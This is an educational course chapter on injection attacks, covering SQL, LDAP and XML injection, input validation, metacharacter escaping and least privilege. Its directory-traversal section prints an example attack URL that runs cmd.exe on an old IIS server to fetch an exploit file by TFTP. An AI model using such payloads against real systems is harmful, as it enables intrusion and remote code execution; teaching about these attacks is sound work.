SHREE LEARNING ACADEMY

A type of security breach known as injection attack involves the insertion of malicious code into a targeted system, enabling the attacker to manipulate its functions and corrupt the associated data. The methods used for injection attacks are varied and numerous. The name given to an injection attack generally reflects either the specific backend system that it exploits or the nature of the malicious payload that it inserts into the target. Some common types of injection attacks are SQL injection, LDAP injection, XML injection, command injection, HTML injection, code injection, and file injection.

When considering an organization's security, SQL injection attacks pose a greater risk than XSS attacks (as explained in the following chapter) because the former target the organization's assets, while the latter target its website visitors or customers. The objective of SQL injection attacks is to manipulate or exploit a web application through the use of unanticipated input. Rather than trying to deceive a user, these attacks utilize such input to gain illicit entry into a database or other associated assets.

During the early days of the internet, web pages were static in nature, meaning that they did not change over time. Webmasters would produce pages containing information and store them on a web server for retrieval by users via their web browsers. As users began to demand more personalized content based on their unique preferences, the traditional model of static web pages became insufficient for the evolving needs of the web. For instance, visitors to a bank website are not satisfied with static pages containing general information about the bank's services, hours, and locations alone. In addition to static content, users also seek dynamic information tailored to their personal needs, such as details related to their individual bank accounts. It is infeasible for webmasters to generate web pages on the server for every single user that contains their specific account information. For a large bank, creating and managing millions of web pages with constantly updated information would be a monumental task. This is where the utilization of dynamic web applications becomes essential.

Web applications make use of a database to generate content on-the-fly in response to user requests. In the context of a banking application, the user would log in by providing their account number and password. Following the user's successful login, the web application retrieves the most up-to-date account information from the bank's database and dynamically generates a web page displaying the user's current account details in real-time. If the same user were to revisit the web application an hour later, the server would again retrieve fresh account information from the database and display it accordingly.

You must be wondering why are we learning this? Well, as a security professional, you must be aware that web applications introduce a higher level of complexity to the conventional security model. Since the web server is a publicly accessible entity, it should be placed in a distinct network zone, such as a demilitarized zone (DMZ), away from other servers. Conversely, the database server is intended for internal use only and should thus be located in the internal network or a secured subnet that is segregated from the DMZ. To enable the web application to connect to the database, the firewall administrator must establish a rule that permits access from the web server to the database server. However, this rule also opens up a potential avenue for unauthorized access to the database server by malicious users on the internet.

Assuming the web application is operating correctly, it should only permit authorized requests to interact with the database. Nonetheless, a flaw in the web application could inadvertently allow individuals to manipulate the database in unexpected and unauthorized ways by exploiting SQL injection vulnerabilities. Such attacks enable malicious actors to carry out SQL transactions directly on the underlying database. By exploiting SQL injection vulnerabilities, attackers can potentially bypass authentication measures, extract sensitive data from database tables, alter existing records, create new records, delete entire tables or databases, and even gain command line-like access via specific database capabilities, like command shell stored procedures.

Measures

There are two methods that can be employed to safeguard web applications against SQL injection attacks:

1. Perform input validation:

Input validation involves restricting the range of data types that a user can provide through a form. To guard against various forms of input injection or manipulation attacks, a comprehensive defense strategy is required, which can involve the use of both whitelisting and blacklisting filters. One should primarily adopt input control techniques such as limiting input length, filtering known malicious content patterns, and escaping metacharacters.

Metacharacters:

Metacharacters are characters that hold specific programmatic meaning, and as such, possess unique capabilities that regular characters do not possess. Some of the metacharacters are the period, or dot; the backslash; open/close square brackets; the vertical bar, or pipe symbol; the semicolon; the dollar sign; the plus sign; the question mark; the caret; the open/close curly braces; the ampersand; single and double quotation marks; open/close parentheses.
. \ [ ] | ; $ + ? ^ { } & ' " ( )

To escape a metacharacter means to indicate that it should be treated as a regular character, without any special programming meaning or function. This process involves marking the metacharacter with a special character or sequence that signals to the system that it should be interpreted as an ordinary character. By doing so, the metacharacter loses its special programming powers and is treated like any other character. One common method of removing the special programmatic powers of a metacharacter is to add a backslash before the character (\^), although there are various other techniques used for escaping metacharacters depending on the specific programming language or execution environment.

2. Limit account privileges

The web server's database account should possess the least number of privileges needed. If the web application merely requires data retrieval capability, then it must be given just that. In essence, SQL injection is a weakness of the script responsible for managing communication between a front-end system (usually a web server) and the underlying database. If the script was developed with a defensive mindset and implemented code to escape or invalidate metacharacters, then SQL injection attacks would be unable to succeed.

An LDAP injection attack is a type of input injection attack that targets the backend of an LDAP directory service rather than a database server. Web server front end scripts that use, user input to create LDAP statements can potentially fall prey to LDAP injection attacks. Sanitizing input and incorporating defensive coding techniques are crucial in preventing this threat just as with SQL injection.

One type of attack similar to SQL injection is XML injection, where the target backend is an XML application. To eliminate this threat, it is necessary to sanitize input.

Directory Traversal/Command Injection

A directory traversal attack allows an attacker to escape the confines of the web root directory structure and access other parts of the file system that are hosted by the operating system of the web server. An attack that used a modified URL to perform directory traversal was commonly used against IIS 4.0 hosted by Windows NT 4.0 Server in the past. The goal was to jump out of the web root directory structure and access the command prompt executable by entering the main OS folders.
For instance: http://yourdomain.com/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+tftp+-i+get+exploit.exe

The URL used in the attack included a UNICODE version of the "change to parent directory" command, which is equivalent to ../ in ASCII, and utilized the percent (%) metacharacter. The attack allowed the attacker to traverse directories and execute commands, thus performing both directory traversal and command injection. The given instance demonstrates the use of a command injection to initiate a TFTP Get operation, which downloads an exploit tool onto the targeted web server. The attacker can execute any command within the constraints of a URL, under the IIS service privileges.

Minor revision: